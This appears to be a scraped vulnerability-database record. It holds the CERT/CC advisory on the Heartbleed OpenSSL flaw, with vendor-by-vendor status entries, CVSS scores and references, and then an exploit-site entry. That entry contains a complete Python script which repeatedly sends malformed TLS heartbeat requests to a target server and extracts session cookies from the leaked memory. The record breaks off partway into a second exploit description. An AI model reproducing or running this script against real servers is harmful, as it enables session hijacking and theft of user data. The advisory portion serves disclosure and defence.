<http://watchguardsecuritycenter.com/2014/04/08/the-heartbleed-openssl-vulnerability-patch-openssl-asap/>\n\n### __ __ Wind River Systems, Inc.\n\nNotified: April 08, 2014 Updated: April 11, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWind River has investigated its products regarding the heart blead vulnerability. The conclusion is:\n\nVxWorks is not vulnerable. \nWR Linux 3.x and 4.x are not vulnerable. \nWR Linux 5.0.1.x is vulnerable if the optional openssl-1.0.1 package is installed. \nWR Linux 6.0.0.x is vulnerable. \nINP 3.4 is vulnerable. \n \nWind River customers can find additional information, e.g. fixes, at the online support web site <https://support.windriver.com/>\n\n### Vendor References\n\n * <https://support.windriver.com/>\n\n### __ nginx\n\nUpdated: April 11, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://nginx.com/blog/nginx-and-the-heartbleed-vulnerability/>\n\n### Addendum\n\nnginx for Windows is statically linked with the OpenSSL library. We have confirmed that nginx versions 1.2.9 through 1.4.7 on Windows provide a vulnerable OpenSSL version.\n\nnginx 1.4.7, which was originally released on March 18, 2014, was silently repackaged with OpenSSL 1.0.1g on April 8, 2014. \nnginx 1.5.13 was officially released on April 8, 2014, and it also includes OpenSSL 1.0.1g, despite not specifically mentioning this vulnerability.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### __ openSUSE project\n\nUpdated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00005.html>\n\n### __ pfSENSE\n\nUpdated: April 17, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://blog.pfsense.org/?p=1253>\n\n### __ __ Brocade\n\nUpdated: April 11, 2014 \n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\n`TECHNICAL SUPPORT BULLETIN \nApril 10, 2014 \n________________________________________ \nTSB 2014-185-ASEVERITY: Low - Information \n________________________________________ \nPRODUCTS AFFECTED: \nAll Brocade products, including Vyatta \n \nCORRECTED IN RELEASE: \nAll current releases of Brocade products, including Vyatta \n \nBULLETIN OVERVIEW \n \nThe purpose of this bulletin is to provide information regarding the recently \ndisclosed vulnerability in the OpenSSL protocol documented by CVE-2014-0160 and \nalso known as \"The Heartbleed bug.\" This vulnerability takes advantage of the \nheartbeat extensions to the OpenSSL protocol (RFC6520). \n \nBrocade's family of IP products ADX, FCX, ICX, MLX, MLX-E, XMR CES, CER, RX, \nSX, VDX offering ServerIron, FastIron, NetIron, RX, Network OS, Brocade Network \nAdvisor, Vyatta and vADX software and SAN products offering FOS software do not \nmake use of the heartbeat extensions and hence are not vulnerable to the \nexploit documented in CVE-2014-0160. \nIn addition, the MyBrocade.com web site does not use OpenSSL and is not \nvulnerable to this issue. \n \n \nPROBLEM STATEMENT \nThe (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not \nproperly handle Heartbeat Extension packets, which allows remote attackers to \nobtain sensitive information from process memory via crafted packets that \ntrigger a buffer over-read, as demonstrated by reading private keys, related to \nd1_both.c and t1_lib.c, aka the Heartbleed bug. \n<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160> \n \nRISK ASSESSMENT \nThere is no risk using Brocade products \nSYMPTOMS \nNot applicable. \nWORKAROUND \nNo workaround is necessary. \nCORRECTIVE ACTION \nNot applicable.`\n\n### __ __ EfficientIP\n\nUpdated: April 09, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nOur system uses FreeBSD 9.2 as basis, and the OpenSSL version shipped with this version (0.9.8y) are stated not be affected.\n\n### __ __ Foundry Networks, Inc.\n\nNotified: April 08, 2014 Updated: April 11, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nNo Brocade (Foundry) products are affected by this vulnerability,\n\n### Addendum\n\nFoundry was purchased by Brocade.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### __ __ Infoblox\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nInfoblox is not affected by this issue (in any released version).\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ __ Microsoft Corporation\n\nNotified: April 08, 2014 Updated: April 21, 2014 \n\n**Statement Date: April 21, 2014**\n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nMicrosoft Services unaffected by OpenSSL \u201cHeartbleed\u201d vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://blogs.technet.com/b/security/archive/2014/04/10/microsoft-devices-and-services-and-the-openssl-heartbleed-vulnerability.aspx>\n\n### __ Opengear\n\nUpdated: April 15, 2014 \n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://opengear.zendesk.com/entries/51667116-CVE-2014-0160-aka-Heartbleed-Opengear-products-are-not-affected>\n\n### __ __ Openwall GNU/*/Linux\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nOpenwall GNU/*/Linux is not affected. The versions of OpenSSL that we redistribute do not contain the vulnerable code.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ __ Peplink\n\nNotified: April 08, 2014 Updated: April 18, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nPeplink products are NOT affected by this vulnerability.\n\n### Vendor References\n\n * <https://forum.peplink.com/threads/3062-Special-Notice-On-OpenSSL-Heartbleed-Vulnerability>\n\n### __ __ Quagga\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nQuagga is not affected by this vulnerability.\n\n### __ SUSE Linux\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00005.html>\n\n### Addendum\n\nSUSE Enterprise Linux uses OpenSSL 0.9.x\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### __ __ Vyatta\n\nNotified: April 08, 2014 Updated: April 11, 2014 \n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\n`TECHNICAL SUPPORT BULLETIN \nApril 10, 2014 \n________________________________________ \nTSB 2014-185-ASEVERITY: Low - Information \n________________________________________ \nPRODUCTS AFFECTED: \nAll Brocade products, including Vyatta \n \nCORRECTED IN RELEASE: \nAll current releases of Brocade products, including Vyatta \n \nBULLETIN OVERVIEW \n \nThe purpose of this bulletin is to provide information regarding the recently \ndisclosed vulnerability in the OpenSSL protocol documented by CVE-2014-0160 and \nalso known as \"The Heartbleed bug.\" This vulnerability takes advantage of the \nheartbeat extensions to the OpenSSL protocol (RFC6520). \n \nBrocade's family of IP products ADX, FCX, ICX, MLX, MLX-E, XMR CES, CER, RX, \nSX, VDX offering ServerIron, FastIron, NetIron, RX, Network OS, Brocade Network \nAdvisor, Vyatta and vADX software and SAN products offering FOS software do not \nmake use of the heartbeat extensions and hence are not vulnerable to the \nexploit documented in CVE-2014-0160. \nIn addition, the MyBrocade.com web site does not use OpenSSL and is not \nvulnerable to this issue. \n \n \nPROBLEM STATEMENT \nThe (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not \nproperly handle Heartbeat Extension packets, which allows remote attackers to \nobtain sensitive information from process memory via crafted packets that \ntrigger a buffer over-read, as demonstrated by reading private keys, related to \nd1_both.c and t1_lib.c, aka the Heartbleed bug. \n``<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160>`` \n \nRISK ASSESSMENT \nThere is no risk using Brocade products \nSYMPTOMS \nNot applicable. \nWORKAROUND \nNo workaround is necessary. \nCORRECTIVE ACTION \nNot applicable.`\n\n### __ __ WSO2\n\nUpdated: April 15, 2014 \n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nOn April 7th, a Security Advisory was issued by the OpenSSL project notifying the public of a serious vulnerability in the encryption software used by a majority of websites on the Internet.\n\n[http://connect.wso2.com/wso2/c/secadv_20140407.txt?_lid=62396&_cid=77097&_t=859269](<http://connect.wso2.com/wso2/c/secadv_20140407.txt?_lid=62396&_cid=77097&_t=859269>) \n \nWe want you to know that our servers were not exposed and your WSO2 account is completely safe. Nevertheless, to ensure there is no additional risk, we strongly encourage you to request a new password. \n[http://connect.wso2.com/wso2/c/password?_lid=62397&_cid=77097&_t=859269](<http://connect.wso2.com/wso2/c/password?_lid=62397&_cid=77097&_t=859269>) \n \nIf you have any questions or concerns, please email security@wso2.com. \n \nFor additional information regarding this vulnerability, please visit: \n[http://connect.wso2.com/wso2/c/heartbleed.com?_lid=62398&_cid=77097&_t=859269](<http://connect.wso2.com/wso2/c/heartbleed.com?_lid=62398&_cid=77097&_t=859269>)\n\n### __ __ m0n0wall\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nm0n0wall is not affected (as it uses OpenSSL 0.9.8).\n\n### __ ACCESS\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ AT&T\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Alcatel-Lucent\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Apple Inc.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Avaya, Inc.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Barracuda Networks\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Belkin, Inc.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Charlotte's Web Networks\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Check Point Software Technologies\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk100173](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk100173>)\n\n### __ Cray Inc.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ D-Link Systems, Inc.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ DragonFly BSD Project\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ EMC Corporation\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Engarde Secure Linux\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Enterasys Networks\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Ericsson\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Force10 Networks, Inc.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Fujitsu\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ IBM Corporation (zseries)\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ IBM eServer\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Internet Security Systems, Inc.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Intoto\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ MontaVista Software, Inc.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ __ NEC Corporation\n\nNotified: April 08, 2014 Updated: April 30, 2014 \n\n**Statement Date: April 30, 2014**\n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nWe provide information on this issue at the following URL\n\n<http://jpn.nec.com/security-info/av14-001.html> (only in Japanese)\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://jpn.nec.com/security-info/av14-001.html>\n\n### __ Nokia\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Novell, Inc.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Palo Alto Networks\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Process Software\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Q1 Labs\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ QNX Software Systems Inc.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ SafeNet\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ SmoothWall\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Snort\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Sony Corporation\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Sourcefire\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Stonesoft\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ The SCO Group\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ TippingPoint Technologies Inc.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Turbolinux\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Watchguard Technologies, Inc.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ ZyXEL\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ eSoft, Inc.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ netfilter\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\nView all 99 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 5.0 | AV:N/AC:L/Au:N/C:P/I:N/A:N \nTemporal | 4.1 | E:F/RL:OF/RC:C \nEnvironmental | 6.5 | CDP:LM/TD:H/CR:H/IR:H/AR:ND \n \n \n\n\n### References \n\n * <http://heartbleed.com/>\n * <http://seclists.org/oss-sec/2014/q2/22>\n * <http://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=96db902>\n * <https://tools.ietf.org/html/rfc6520>\n * <http://www.openssl.org/news/openssl-1.0.1-notes.html>\n * <http://www.hut3.net/blog/cns---networks-security/2014/04/14/bugs-in-heartbleed-detection-scripts->\n * <http://blog.cryptographyengineering.com/2014/04/attack-of-week-openssl-heartbleed.html>\n * <http://blog.fox-it.com/2014/04/08/openssl-heartbleed-bug-live-blog/>\n * <https://www.cert.fi/en/reports/2014/vulnerability788210.html>\n * <http://xkcd.com/1354/>\n * <https://code.google.com/p/mod-spdy/issues/detail?id=85>\n * <http://www.exploit-db.com/exploits/32745/>\n * <https://access.redhat.com/security/cve/CVE-2014-0160>\n * <http://www.ubuntu.com/usn/usn-2165-1/>\n * <http://www.freshports.org/security/openssl/>\n * <https://blog.torproject.org/blog/openssl-bug-cve-2014-0160>\n\n### Acknowledgements\n\nThis vulnerability was reported by OpenSSL, who in turn credits Riku, Antti and Matti at Codenomicon and Neel Mehta of Google Security.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2014-0160](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160>) \n---|--- \n**Date Public:** | 2014-04-07 \n**Date First Published:** | 2014-04-08 \n**Date Last Updated: ** | 2016-05-13 15:26 UTC \n**Document Revision: ** | 177 \n", "modified": "2016-05-13T15:26:00", "published": "2014-04-08T00:00:00", "id": "VU:720951", "href": "https://www.kb.cert.org/vuls/id/720951", "type": "cert", "title": "OpenSSL TLS heartbeat extension read overflow discloses sensitive information", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zdt": [{"lastseen": "2018-03-14T02:43:51", "bulletinFamily": "exploit", "description": "This python script is a modification of the heartbleed proof of concept exploit that looks for cookies, specifically user sessions.", "modified": "2014-04-09T00:00:00", "published": "2014-04-09T00:00:00", "id": "1337DAY-ID-22118", "href": "https://0day.today/exploit/description/22118", "type": "zdt", "title": "Heartbleed User Session Extraction Exploit", "sourceData": "#!/usr/bin/python\r\n\r\n# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions.\r\n# Michael Davis ([email\u00a0protected])\r\n\r\n# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email\u00a0protected])\r\n\r\n# The author disclaims copyright to this source code.\r\n\r\nimport select\r\nimport sys\r\nimport string\r\nimport struct\r\nimport socket\r\nimport time\r\nfrom optparse import OptionParser\r\n\r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\noptions.add_option('-c', '--cookie', type='str', default='session', help='Cookie to look for. (default: session)')\r\n\r\n\r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n\r\nhello = h2bin('''\r\n16 03 02 00 dc 01 00 00 d8 03 02 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01\r\n''')\r\n\r\nhb = h2bin('''\r\n18 03 02 00 03\r\n01 40 00\r\n''')\r\n\r\n\r\nclass HeartBleeder(object):\r\n\r\n server_response = None\r\n socket = None\r\n hostname = ''\r\n port = 443\r\n found_sessions = set()\r\n cookie = 'session'\r\n cookie_length = 56\r\n\r\n def __init__(self, hostname='', cookie=''):\r\n self.hostname = hostname\r\n self.cookie = cookie\r\n\r\n def connect(self):\r\n \"\"\"\r\n Connects to the remote server.\r\n \"\"\"\r\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sys.stdout.flush()\r\n self.socket.connect((self.hostname, self.port))\r\n sys.stdout.flush()\r\n self.socket.send(hello)\r\n sys.stdout.flush()\r\n\r\n def rcv_response(self):\r\n while True:\r\n _type, version, payload = self.rcv_message()\r\n if _type is None:\r\n print 'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if _type == 22 and ord(payload[0]) == 0x0E:\r\n break\r\n\r\n def rcv_message(self):\r\n\r\n record_header = self.rcv_all(5)\r\n if record_header is None:\r\n print 'Unexpected EOF receiving record header - server closed connection'\r\n return None, None, None\r\n _type, version, line = struct.unpack('>BHH', record_header)\r\n payload = self.rcv_all(line, 10)\r\n if payload is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n # print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return _type, version, payload\r\n\r\n def rcv_all(self, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time()\r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([self.socket], [], [], 5)\r\n if self.socket in r:\r\n data = self.socket.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n\r\n def try_heartbeat(self):\r\n self.socket.send(hb)\r\n while True:\r\n _type, version, self.payload = self.rcv_message()\r\n if _type is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n\r\n if _type == 24:\r\n # print 'Received heartbeat response:'\r\n self.parse_response()\r\n if len(self.payload) > 3:\r\n pass\r\n # print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n\r\n if _type == 21:\r\n print 'Received alert:'\r\n self.hexdump(self.payload)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n\r\n def parse_response(self):\r\n \"\"\"\r\n Parses the response from the server for a session id.\r\n \"\"\"\r\n ascii = ''.join((c if 32 <= ord(c) <= 126 else ' ')for c in self.payload)\r\n index = string.find(ascii, self.cookie)\r\n if index >= 0:\r\n info = ascii[index:index + self.cookie_length]\r\n session = info.split(' ')[0]\r\n session = string.replace(session, ';', '')\r\n if session not in self.found_sessions:\r\n self.found_sessions.add(session)\r\n print session\r\n\r\n def hexdump(self, payload):\r\n \"\"\"\r\n Prints out a hexdump in the event that server returns an error.\r\n \"\"\"\r\n for b in xrange(0, len(payload), 16):\r\n line = [c for c in payload[b:b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in line)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in line)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n\r\n def scan(self):\r\n self.connect()\r\n self.rcv_response()\r\n self.try_heartbeat()\r\n\r\n\r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n\r\n cookies_str = 'session'\r\n if len(args) > 1:\r\n cookies_str = args[1]\r\n\r\n print cookies_str\r\n\r\n while True:\r\n heartbeat = HeartBleeder(hostname=args[0], cookie=cookies_str)\r\n heartbeat.scan()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22118"}, {"lastseen": "2018-04-13T03:43:15", "bulletinFamily": "exploit", "description": "This exploit uses OpenSSL to create an encrypted connection and trigger the heartbleed leak. The leaked information is returned within encrypted SSL packets and is then decrypted and wrote to a file to annoy IDS/forensics. The exploit can set heartbeat payload length arbitrarily or use two preset values for NULL and MAX length.", "modified": "2014-04-24T00:00:00", "published": "2014-04-24T00:00:00", 